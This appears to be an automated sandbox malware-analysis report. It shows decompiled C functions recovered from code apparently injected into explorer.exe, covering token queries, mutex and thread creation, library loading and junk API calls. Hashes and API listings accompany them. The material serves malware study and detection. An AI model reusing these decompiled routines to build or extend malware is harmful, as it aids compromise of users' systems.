Arc.GDI32(00000000,00000007,0000001C,00000017,00000051,00000009,00000005,0000005B,00000022), ref: 00F5479B

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcessmemset$CreateFileHeapInfoModuleNameVersion
String ID:
API String ID: 1078571286-0
Opcode ID: 904c681b9375c2a2820609e51b34a19534590e4b35b9016929b2ea6464be1ccd
Instruction ID: 6576f31d05868511cef4149e9e4299d13469879143333a84cc6cd876e032e0b8
Opcode Fuzzy Hash: 904c681b9375c2a2820609e51b34a19534590e4b35b9016929b2ea6464be1ccd
Instruction Fuzzy Hash: 12113B71654204AFE620BF55DC0AFFE7BE8EB45701F040055FA059A1D2D7B85445EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F612F6, Relevance: 4.5, APIs: 3, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00F612F6(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, DWORD* _a12) {
				long _v8;
				void* _v12;
				void* _t16;
				void* _t28;

				_push(_t23);
				_t28 = 0;
				if(GetTokenInformation(_a4, _a8, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t16 = _t28;
				} else {
					_t28 = E00F5AC58(_v8);
					_v12 = _t28;
					if(_t28 != 0) {
						if(GetTokenInformation(_a4, _a8, _t28, _v8, _a12) != 0) {
							goto L6;
						} else {
							E00F5AB81( &_v12, _t20);
							goto L3;
						}
					} else {
						L3:
						_t16 = 0;
					}
				}
				return _t16;
			}

0x00f612fa
0x00f61305
0x00f61314
0x00f6135e
0x00f6135e
0x00f61321
0x00f61329
0x00f6132c
0x00f61331
0x00f6134e
0x00000000
0x00f61350
0x00f61355
0x00000000
0x00f6135b
0x00f61333
0x00f61333
0x00f61333
0x00f61333
0x00f61331
0x00f61362

APIs

GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00001644,?,?,?,00F60E16,00000000,00000001,00000000,00001644), ref: 00F6130F
GetLastError.KERNEL32(?,?,?,00F60E16,00000000,00000001,00000000,00001644,?,?,?,00F5F71E,00000000), ref: 00F61316

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,00F5F71E,?,?,?,00F60E16,00000000,00000001,00000000,00001644), ref: 00F61349

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: 809c6d74d7899a38d2c79cc2b5a47b76cb0297b9c06a151d1c82a5ddde519e4d
Instruction ID: 401a5e8d2e93af78683fb554310b13dbd3bc280dbda735aed8cefba770b208ca
Opcode Fuzzy Hash: 809c6d74d7899a38d2c79cc2b5a47b76cb0297b9c06a151d1c82a5ddde519e4d
Instruction Fuzzy Hash: 0C014F72A04218FF8F119FA5DC06EDE7FA9FF047A07184151F906D6120E631DA11FB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F5FA69, Relevance: 4.5, APIs: 3, Instructions: 33
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5FA69(CHAR* _a4, intOrPtr _a8) {
				intOrPtr _t10;
				void* _t11;
				intOrPtr _t12;
				void* _t16;

				_t16 = CreateMutexA(0, 1, _a4);
				if(_t16 != 0) {
					if(GetLastError() == 0xb7) {
						_t10 =  *0xf89740; // 0x547f6c8
						_t11 =  *((intOrPtr*)(_t10 + 0x2c))(_t16, _a8);
						if(_t11 != 0 && _t11 != 0x80) {
							_t12 =  *0xf89740; // 0x547f6c8
							 *((intOrPtr*)(_t12 + 0x30))(_t16);
							_t16 = 0;
						}
					}
					return _t16;
				}
				GetLastError();
				return 0;
			}

0x00f5fa7f
0x00f5fa83
0x00f5fa9a
0x00f5fa9f
0x00f5faa5
0x00f5faaa
0x00f5fab3
0x00f5fab9
0x00f5fabc
0x00f5fabc
0x00f5faaa
0x00000000
0x00f5fabe
0x00f5fa85
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,00F5831B,?,00000064,00000000,00000000,00000000), ref: 00F5FA79
GetLastError.KERNEL32(?,00F5831B,?,00000064,00000000,00000000,00000000), ref: 00F5FA85
GetLastError.KERNEL32(?,00F5831B,?,00000064,00000000,00000000,00000000), ref: 00F5FA8F

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateMutex
String ID:
API String ID: 200418032-0
Opcode ID: 30861866a1ecf0fb5a5e81c139edf96b36bc6262a020fad1c0759318370b9d54
Instruction ID: 8f0810318e57ff5baba6cca6bfb93f4cacc54208165ba38ea021228c0b6ffc18
Opcode Fuzzy Hash: 30861866a1ecf0fb5a5e81c139edf96b36bc6262a020fad1c0759318370b9d54
Instruction Fuzzy Hash: BAF054326141159BC7215BA89848FBD3799FF0C762F4540A1FE0EC7162D674C848E792

Uniqueness

Uniqueness Score: -1.00%

Function 00F58A0E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00F58A0E(void* __ecx, struct HDC__* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, char _a12) {
				char _v40;
				char _v572;
				void* __esi;
				intOrPtr _t24;
				intOrPtr _t26;
				void* _t31;
				void* _t45;
				void* _t46;
				intOrPtr _t52;
				char _t55;
				void* _t56;
				void* _t57;
				void* _t58;

				_t46 = __ecx;
				_t24 =  *0xf89720; // 0xf90000
				_t57 = _t56 - 0x238;
				_push( *((intOrPtr*)( *((intOrPtr*)(_t24 + 0x110)))));
				_t26 =  *0xf8974c; // 0x547f890
				_push(_a8);
				if( *((intOrPtr*)(_t26 + 0x64))() == 0) {
					_t55 = _a12;
					_t7 = _t55 + 4; // 0xcc48300
					_t31 = E00F57D83(__edx, __fp0, _a8, _a4,  *_t7,  &_v572,  &_a12); // executed
					_t58 = _t57 + 0x14;
					if(_t31 != 0) {
						goto L9;
					} else {
						_t10 = _t55 + 0xc; // 0xb4
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t55 + 0x10)) + 1;
						_t52 = 0;
						_t45 = 0;
						if( *_t10 > 0) {
							_a12 = 0;
							while(1) {
								_t15 = _t55 + 8; // 0x90ff0a6a
								_t45 = E00F5BF60( *_t15 + _t52, _a8,  &_v572);
								E00F5ABE5( &_v40, "zO,w3jD.enLMp2BGZVX9C2zjrN3TOdPjp ,YqSny4GupHnjFeHVvm5Eeq vbJpiJsrBOA00R .X nNDByaNfQdSf9iaVst,QNGDPajDpMdLf2U50dRAW4n  55Xy zT5HgOdcq6fHTYx5ysqYh2zX308e beKmbM8Cml6A9j7ow4E7cvSlvYx0gw8IwPg2EqXj,TFffoLmR,9flIE5,wk.,b ,JtEKgeSPtLFE4b,1bu yQxdZ9I7CwNbPSBM3,9obuh0ADnYj5jl4r eRaC58KDEXCg5BO4sWxVoQg76ckcbxy5fQ,fD7w2o6 v6kVTAzo9AUJ0 xmC2b vKRtVA 700KGm3fn,HDpVpJagR f5l5W5,7Pavs64ZxBJZ6B,Hrw  Whka3T7a6DV 579YL66Up9P7U6grR2DT3uTWfwoWLSF8,F5c", 0x24);
								_t58 = _t58 + 0x18;
								if(_t45 != 0) {
									goto L6;
								}
								_a12 = _a12 + 1;
								_t52 = _t52 + 0xc;
								_t21 = _t55 + 0xc; // 0xb4
								if(_a12 <  *_t21) {
									continue;
								}
								goto L6;
							}
						}
						L6:
						IsValidCodePage(0x1b);
						if(_t45 != 0 || E00F5889F(_t46, _t55, _a8,  &_v572) >= 0) {
							goto L9;
						} else {
							_push(0xfffffffe);
							_pop(0);
						}
					}
				}
				return 0;
			}

0x00f58a0e
0x00f58a11
0x00f58a1c
0x00f58a25
0x00f58a27
0x00f58a2c
0x00f58a34
0x00f58a3a
0x00f58a48
0x00f58a51
0x00f58a56
0x00f58a5b
0x00000000
0x00f58a5d
0x00f58a5d
0x00f58a60
0x00f58a63
0x00f58a65
0x00f58a69
0x00f58a6b
0x00f58a6e
0x00f58a75
0x00f58a88
0x00f58a93
0x00f58a98
0x00f58a9d
0x00000000
0x00000000
0x00f58a9f
0x00f58aa5
0x00f58aa8
0x00f58aab
0x00000000
0x00000000
0x00000000
0x00f58aab
0x00f58a6e
0x00f58aad
0x00f58aaf
0x00f58ab7
0x00000000
0x00f58ace
0x00f58ace
0x00f58ad0
0x00f58ad0
0x00f58ab7
0x00f58a5b
0x00f58ad9

APIs

Part of subcall function 00F57D83: memset.MSVCRT ref: 00F57DB0
Part of subcall function 00F57D83: GetLastError.KERNEL32 ref: 00F57DE1
Part of subcall function 00F57D83: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F57E1D

IsValidCodePage.KERNEL32(0000001B), ref: 00F58AAF

Strings

zO,w3jD.enLMp2BGZVX9C2zjrN3TOdPjp ,YqSny4GupHnjFeHVvm5Eeq vbJpiJsrBOA00R .X nNDByaNfQdSf9iaVst,QNGDPajDpMdLf2U50dRAW4n 55Xy zT5HgOdcq6fHTYx5ysqYh2zX308e beKmbM8Cml6A9j7ow4E7cvSlvYx0gw8IwPg2EqXj,TFffoLmR,9flIE5,wk.,b ,JtEKgeSPtLFE4b,1bu yQxdZ9I7CwNbPSBM3,9obuh, xrefs: 00F58A8D

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharCodeErrorLastMultiPageValidWidememset
String ID: zO,w3jD.enLMp2BGZVX9C2zjrN3TOdPjp ,YqSny4GupHnjFeHVvm5Eeq vbJpiJsrBOA00R .X nNDByaNfQdSf9iaVst,QNGDPajDpMdLf2U50dRAW4n 55Xy zT5HgOdcq6fHTYx5ysqYh2zX308e beKmbM8Cml6A9j7ow4E7cvSlvYx0gw8IwPg2EqXj,TFffoLmR,9flIE5,wk.,b ,JtEKgeSPtLFE4b,1bu yQxdZ9I7CwNbPSBM3,9obuh
API String ID: 513024628-4281377785
Opcode ID: 73a7094094f63732cf5b56bf19eb3b9f69d3d8383e6ea1ad196ed1dd5eb8d99b
Instruction ID: 7b085d0fbce3ec8306cefa8ced9327521fe92cbb4c30a65a227f0f4ac1de107d
Opcode Fuzzy Hash: 73a7094094f63732cf5b56bf19eb3b9f69d3d8383e6ea1ad196ed1dd5eb8d99b
Instruction Fuzzy Hash: B5217F72A00309BFCF10AF94DC85EEB37A9FB04361B104566FE1AD6151EB34EA19AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F54B68, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00F54B68(void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				char _v52;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t33;

				_v8 = _v8 & 0x00000000;
				E00F5CDBD( &_v52, __eflags, _a4);
				_t21 =  *0xf89720; // 0xf90000
				if( *((intOrPtr*)(_t21 + 0x644)) > 0) {
					L1:
					_t33 =  *0xf89740; // 0x547f6c8
					 *((intOrPtr*)(_t33 + 0xb4))(0x32);
					goto L1;
				}
				_push(0);
				_push( &_v52);
				_push("\\");
				_v12 = E00F5B367("Global");
				_t24 = E00F54AE5(_t23, _a8,  &_v8); // executed
				__eflags = _t24 - 1;
				if(_t24 == 1) {
					FindCloseChangeNotification(_v8);
					_t13 =  &_v8;
					 *_t13 = _v8 & 0x00000000;
					__eflags =  *_t13;
					E00F54AE5( &_v52, _a8,  &_v8); // executed
				}
				E00F5AB81( &_v12, 0xffffffff);
				return _v8;
			}

0x00f54b6e
0x00f54b79
0x00f54b7e
0x00f54b8c
0x00f54b8e
0x00f54b8e
0x00f54b95
0x00000000
0x00f54b95
0x00f54b9d
0x00f54ba2
0x00f54ba3
0x00f54bb9
0x00f54bbd
0x00f54bc5
0x00f54bc8
0x00f54bd2
0x00f54bd5
0x00f54bd5
0x00f54bd5
0x00f54be4
0x00f54be9
0x00f54bf2
0x00f54bfd

APIs

FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,00000000,00000000), ref: 00F54BD2

Strings

Global, xrefs: 00F54BA8

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: Global
API String ID: 2591292051-4020866741
Opcode ID: 8a5ce04d66670e867b0542658a7e81e8b18c38a283f82468973b311d32c47ff4
Instruction ID: 8d81a2544d3513f5ac97d329281dfcf779756f15119512ff9a9b7a677450e0bf
Opcode Fuzzy Hash: 8a5ce04d66670e867b0542658a7e81e8b18c38a283f82468973b311d32c47ff4
Instruction Fuzzy Hash: 58111876814208FFDB00EF90DD46FED7BB8FB00325F500055FA15A6192D775AA58EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F5C179, Relevance: 3.1, APIs: 2, Instructions: 134
threadCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00F5C179(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t71;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				void* _t88;
				struct _SECURITY_ATTRIBUTES* _t89;
				intOrPtr _t96;
				intOrPtr _t98;
				void* _t99;
				signed int _t101;
				intOrPtr _t106;
				intOrPtr _t112;
				void* _t114;
				signed int _t116;
				void* _t118;

				_t50 =  *0xf89740; // 0x547f6c8
				_t89 = 0;
				_t51 =  *((intOrPtr*)(_t50 + 0x2c))( *0xf8983c, 0x7530, _t88, __ecx);
				if(_t51 == 0 || _t51 == 0x80) {
					_v8 = _t89;
					_t114 = 0;
					do {
						_t52 =  *0xf897e4; // 0x547c418
						_t53 =  *((intOrPtr*)(_t114 + _t52));
						if(_t53 == _t89) {
							L7:
							_t54 =  *0xf897e4; // 0x547c418
							if( *((intOrPtr*)(_t114 + _t54)) == _t89) {
								_t116 = _v8 << 5;
								if(_a8 == _t89) {
									 *(_t116 + _t54 + 0x10) = _t89;
									_t55 =  *0xf897e4; // 0x547c418
									 *(_t116 + _t55 + 0xc) = _t89;
									L14:
									_t56 =  *0xf897e4; // 0x547c418
									 *((intOrPtr*)(_t116 + _t56 + 0x14)) = _a16;
									_t57 =  *0xf897e4; // 0x547c418
									 *((intOrPtr*)(_t116 + _t57 + 8)) = _a4;
									_t58 = E00F5FA69(_t89, 1); // executed
									_t96 =  *0xf897e4; // 0x547c418
									 *((intOrPtr*)(_t116 + _t96 + 0x1c)) = _t58;
									_t59 =  *0xf897e4; // 0x547c418
									_t32 = _t59 + _t116 + 4; // 0x547c41c
									_t62 = CreateThread(_t89, _t89, E00F5C320, _t59 + _t116, _t89, _t32);
									_t98 =  *0xf897e4; // 0x547c418
									 *(_t116 + _t98) = _t62;
									_t63 =  *0xf897e4; // 0x547c418
									_t99 =  *(_t63 + _t116);
									if(_t99 != _t89) {
										SetThreadPriority(_t99, 0xffffffff);
										_t65 =  *0xf897e4; // 0x547c418
										_t66 =  *0xf89740; // 0x547f6c8
										 *0xf897e0 =  *0xf897e0 + 1;
										 *((intOrPtr*)(_t66 + 0x90))( *((intOrPtr*)(_t116 + _t65 + 0x1c)));
										_t68 =  *0xf897e4; // 0x547c418
										_t89 = _t116 + _t68;
									} else {
										_t72 =  *0xf89740; // 0x547f6c8
										 *((intOrPtr*)(_t72 + 0x30))( *((intOrPtr*)(_t63 + _t116 + 0x1c)));
										_t74 =  *0xf897e4; // 0x547c418
										_t40 = _t116 + 0xc; // 0x547c424
										_t100 = _t74 + _t40;
										if( *((intOrPtr*)(_t74 + _t40)) != _t89) {
											E00F5AB81(_t100,  *((intOrPtr*)(_t74 + _t116 + 0x10)));
										}
										_t75 =  *0xf897e4; // 0x547c418
										_t101 = 8;
										memset(_t116 + _t75, 0, _t101 << 2);
									}
									L19:
									L20:
									_t69 =  *0xf89740; // 0x547f6c8
									 *((intOrPtr*)(_t69 + 0x90))( *0xf8983c);
									_t71 = _t89;
									goto L21;
								}
								_t112 = _a12;
								_t79 = E00F5AC58(_t112);
								_t106 =  *0xf897e4; // 0x547c418
								 *((intOrPtr*)(_t116 + _t106 + 0xc)) = _t79;
								_t80 =  *0xf897e4; // 0x547c418
								if( *((intOrPtr*)(_t80 + _t116 + 0xc)) == _t89) {
									goto L19;
								}
								 *((intOrPtr*)(_t80 + _t116 + 0x10)) = _t112;
								_t81 =  *0xf897e4; // 0x547c418
								E00F5ABE5( *((intOrPtr*)(_t116 + _t81 + 0xc)), _a8, _t112);
								_t118 = _t118 + 0xc;
								goto L14;
							}
							goto L8;
						}
						_push(_t89);
						_push(_t53);
						_t83 =  *0xf89740; // 0x547f6c8
						if( *((intOrPtr*)(_t83 + 0x2c))() == 0x102) {
							goto L8;
						}
						_t85 =  *0xf897e4; // 0x547c418
						E00F5C10C(_t85 + _t114, _t89);
						goto L7;
						L8:
						_v8 = _v8 + 1;
						_t114 = _t114 + 0x20;
					} while (_t114 < 0x1000);
					goto L20;
				} else {
					_t71 = 0;
					L21:
					return _t71;
				}
			}

0x00f5c17d
0x00f5c18e
0x00f5c190
0x00f5c195
0x00f5c1a6
0x00f5c1a9
0x00f5c1ab
0x00f5c1ab
0x00f5c1b0
0x00f5c1b5
0x00f5c1d6
0x00f5c1d6
0x00f5c1de
0x00f5c1f6
0x00f5c1fd
0x00f5c23d
0x00f5c241
0x00f5c246
0x00f5c24a
0x00f5c24a
0x00f5c252
0x00f5c256
0x00f5c261
0x00f5c265
0x00f5c26c
0x00f5c272
0x00f5c276
0x00f5c27d
0x00f5c28f
0x00f5c292
0x00f5c298
0x00f5c29b
0x00f5c2a0
0x00f5c2a5
0x00f5c2e0
0x00f5c2e6
0x00f5c2ef
0x00f5c2f4
0x00f5c2fa
0x00f5c300
0x00f5c305
0x00f5c2a7
0x00f5c2ab
0x00f5c2b0
0x00f5c2b3
0x00f5c2b8
0x00f5c2b8
0x00f5c2be
0x00f5c2c5
0x00f5c2cb
0x00f5c2cc
0x00f5c2d6
0x00f5c2d9
0x00f5c2d9
0x00f5c308
0x00f5c309
0x00f5c30f
0x00f5c314
0x00f5c31a
0x00000000
0x00f5c31c
0x00f5c1ff
0x00f5c203
0x00f5c209
0x00f5c20f
0x00f5c213
0x00f5c21c
0x00000000
0x00000000
0x00f5c226
0x00f5c22a
0x00f5c233
0x00f5c238
0x00000000
0x00f5c238
0x00000000
0x00f5c1de
0x00f5c1b7
0x00f5c1b8
0x00f5c1b9
0x00f5c1c6
0x00000000
0x00000000
0x00f5c1c8
0x00f5c1d0
0x00000000
0x00f5c1e0
0x00f5c1e0
0x00f5c1e3
0x00f5c1e6
0x00000000
0x00f5c19e
0x00f5c19e
0x00f5c31d
0x00f5c31f
0x00f5c31f

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_0000C320,0547C418,00000000,0547C41C,00000000,00000000,?,?,?,00F55010,00F55133,00000000,00000000,00000000), ref: 00F5C28F

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d7a857319251d2afb3413689e5ff669d6d3ac9d4dff172cf16472c853157170c
Instruction ID: b38a2f09be6a947618d90c07a2bbfc03774a4fbe8bb570c81806804cfa9b4827
Opcode Fuzzy Hash: d7a857319251d2afb3413689e5ff669d6d3ac9d4dff172cf16472c853157170c
Instruction Fuzzy Hash: CA518A72628608DFC725CF58EC84DBE77F9FB08715758446AFA0687266C7B4E904EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00F5460B, Relevance: 3.1, APIs: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5460B(void* __ebx, void* __edx, void* __esi, void* __fp0) {
				char _v44;
				void* __edi;
				intOrPtr _t6;
				signed int _t7;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				signed int _t13;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t26;
				void* _t32;
				void* _t36;
				void* _t40;
				void* _t43;
				intOrPtr* _t45;

				_t47 = __fp0;
				_t40 = __esi;
				_t36 = __edx;
				_t32 = __ebx;
				_t6 =  *0xf89720; // 0xf90000
				_t7 = E00F5C6A6(__fp0, 0, 0,  *((intOrPtr*)(_t6 + 0xac)), 0, 0); // executed
				_t45 = _t43 - 0x28 + 0x14;
				 *0xf897e8 = _t7;
				if(_t7 != 0) {
					_t8 =  *0xf89720; // 0xf90000
					__eflags =  *((intOrPtr*)(_t8 + 0xa4)) - 1;
					if(__eflags == 0) {
						E00F6C891(_t36, __eflags, __fp0); // executed
					} else {
						E00F6CBE3(_t36, __fp0);
					}
					_t10 = E00F54827(_t32, _t36, __eflags); // executed
					 *0xf89744 = _t10;
					_t11 = _t10;
					__eflags = _t11;
					if(_t11 == 0) {
						_t12 = E00F5441A(0, _t47); // executed
						__eflags = _t12;
						if(__eflags < 0) {
							goto L12;
						}
						goto L11;
					} else {
						_t16 = _t11 - 1;
						__eflags = _t16;
						if(__eflags == 0) {
							L11:
							E00F6C891(_t36, __eflags, _t47); // executed
							E00F54589(__eflags);
							L12:
							_t13 = 0;
							__eflags = 0;
							goto L13;
						}
						_t17 = _t16 - 1;
						__eflags = _t17;
						if(_t17 != 0) {
							__eflags = _t17 - 1;
							if(__eflags == 0) {
								_t19 =  *0xf89720; // 0xf90000
								_t41 =  &_v44;
								E00F5CDBD( &_v44, __eflags,  *((intOrPtr*)(_t19 + 0xac)) + 4);
								ArcTo(0, 0x5a, 0x3f, 0x47, 0x23, 0x4b, 0x58, 0x13, 0x2f);
								E00F5D0BD(_t41);
								_t26 =  *0xf89720; // 0xf90000
								 *_t45 = 0x1d4c0;
								 *0xf89748 = E00F54B68(_t41, __eflags,  *((intOrPtr*)(_t26 + 0xac)), _t40);
								E00F547B3(_t36, _t47);
								IsValidCodePage(0x33);
								E00F54589(__eflags);
							}
						}
						goto L12;
					}
				} else {
					_t13 = _t7 | 0xffffffff;
					L13:
					return _t13;
				}
			}

0x00f5460b
0x00f5460b
0x00f5460b
0x00f5460b
0x00f5460e
0x00f54623
0x00f54628
0x00f5462b
0x00f54632
0x00f5463c
0x00f54641
0x00f54648
0x00f54651
0x00f5464a
0x00f5464a
0x00f5464a
0x00f54656
0x00f5465b
0x00f54660
0x00f54660
0x00f54662
0x00f546dc
0x00f546e1
0x00f546e3
0x00000000
0x00000000
0x00000000
0x00f54664
0x00f54664
0x00f54664
0x00f54665
0x00f546e5
0x00f546e5
0x00f546ea
0x00f546ef
0x00f546ef
0x00f546ef
0x00000000
0x00f546ef
0x00f54667
0x00f54667
0x00f54668
0x00f5466e
0x00f5466f
0x00f54671
0x00f54681
0x00f54684
0x00f5469b
0x00f546a4
0x00f546a9
0x00f546ae
0x00f546c2
0x00f546c7
0x00f546ce
0x00f546d4
0x00f546d9
0x00f5466f
0x00000000
0x00f54668
0x00f54634
0x00f54634
0x00f546f1
0x00f546f3
0x00f546f3

APIs

ArcTo.GDI32(00000000,0000005A,0000003F,00000047,00000023,0000004B,00000058,00000013,0000002F,00000001), ref: 00F5469B
IsValidCodePage.KERNEL32(00000033), ref: 00F546CE

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CodePageValid
String ID:
API String ID: 1911128615-0
Opcode ID: e1a6df5fd93361135eb7248d8a2751ce5fb0eff2f402c8e1e77d8b978f83d6a2
Instruction ID: 3fedba8cafbb6c844ef307e5b7b1891f55a4ff2e02abbf7b691d542a09b6fe9a
Opcode Fuzzy Hash: e1a6df5fd93361135eb7248d8a2751ce5fb0eff2f402c8e1e77d8b978f83d6a2
Instruction Fuzzy Hash: 3A2108316542046FE6207B78DC0AFBE36E4FB4675AF040024FF46971D2DA68A488FA62

Uniqueness

Uniqueness Score: -1.00%

Function 00F516F5, Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F516F5(intOrPtr _a4, intOrPtr _a8, char _a12, signed char _a16) {
				intOrPtr _v12;
				char _v16;
				void* _t22;
				signed int _t23;
				signed int _t28;
				void* _t31;
				signed int _t33;
				void* _t37;
				struct HDC__* _t39;
				void* _t42;

				_t39 = 0;
				_t37 = 0;
				ArcTo(0, 0x48, 0x62, 0x29, 0x3c, 0x37, 0x31, 0x19, 0x51);
				IsValidCodePage(0x26); // executed
				_t33 = 0;
				_t42 =  *0xf89634 - _t39; // 0xf5138d
				if(_t42 == 0) {
					L6:
					_t22 = 0xfffffffe;
					return _t22;
				}
				_t23 = 0;
				do {
					_t1 = _t23 + 0xf89630; // 0x1
					if(_a4 != ( *_t1 & 0x0000ffff)) {
						goto L4;
					}
					_t37 = 1;
					if( *((intOrPtr*)(_t23 + 0xf89634)) != _t39) {
						_v16 = _a12;
						_v12 = _a8;
						_t28 = _t33;
						if( *((char*)(0xf89632 + _t28 * 8)) == 1 || (_a16 & 0x00000004) != 0) {
							_t39 =  *((intOrPtr*)(0xf89634 + _t28 * 8))( &_v16);
							goto L12;
						} else {
							_t31 = E00F5C179( &_v16,  *((intOrPtr*)(0xf89634 + _t28 * 8)),  &_v16, 0xc, _t39); // executed
							if(_t31 != 0) {
								L12:
								return _t39;
							}
							return 0xfffffc18;
						}
					}
					L4:
					_t33 = _t33 + 1;
					_t23 = _t33 << 3;
				} while ( *((intOrPtr*)(_t23 + 0xf89634)) != _t39);
				if(_t37 != _t39) {
					return _t23 | 0xffffffff;
				}
				goto L6;
			}

0x00f5170d
0x00f51710
0x00f51712
0x00f5171a
0x00f51720
0x00f51722
0x00f51728
0x00f51755
0x00f51757
0x00000000
0x00f51757
0x00f5172a
0x00f5172c
0x00f5172c
0x00f51736
0x00000000
0x00000000
0x00f5173a
0x00f51741
0x00f5175d
0x00f51763
0x00f51766
0x00f51770
0x00f517a4
0x00000000
0x00f51778
0x00f51786
0x00f51790
0x00f517a6
0x00000000
0x00f517a6
0x00000000
0x00f51792
0x00f51770
0x00f51743
0x00f51743
0x00f51746
0x00f51749
0x00f51753
0x00000000
0x00f517aa
0x00000000

APIs

ArcTo.GDI32(00000000,00000048,00000062,00000029,0000003C,00000037,00000031,00000019,00000051,00000000,00000000,00000000,00000000), ref: 00F51712
IsValidCodePage.KERNELBASE(00000026,?,?,?,?,?,00F55039), ref: 00F5171A

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CodePageValid
String ID:
API String ID: 1911128615-0
Opcode ID: d9f01e99b2a7ef1d19dcd9bc10e3378770c820ecb9d6617423c6dc91fee8b330
Instruction ID: 292058ec4b74f325a221d213dda391dbf93136391fd497cd11a6df7ae241153b
Opcode Fuzzy Hash: d9f01e99b2a7ef1d19dcd9bc10e3378770c820ecb9d6617423c6dc91fee8b330
Instruction Fuzzy Hash: 8B213D35E44218ABD7214B2CAC05FBA3794FB5CB61F000119FF15D61D1E2B09998F790

Uniqueness

Uniqueness Score: -1.00%

Function 00F5F138, Relevance: 3.0, APIs: 2, Instructions: 30
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00F5F138(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _t8;
				struct HINSTANCE__* _t10;
				void* _t15;
				void* _t20;

				_t8 = E00F62CB7();
				_t20 = 0;
				_v8 = _t8;
				_push(_t8);
				if(_a12 != 0x50c) {
					_t10 = LoadLibraryA(); // executed
				} else {
					_t10 = GetModuleHandleA();
				}
				if(_t10 != 0) {
					_t15 = E00F5F184(_a8, _a4, _t10); // executed
					_t20 = _t15;
				}
				E00F5B9F4( &_v8);
				return _t20;
			}

0x00f5f140
0x00f5f145
0x00f5f14e
0x00f5f151
0x00f5f152
0x00f5f161
0x00f5f154
0x00f5f154
0x00f5f154
0x00f5f165
0x00f5f16e
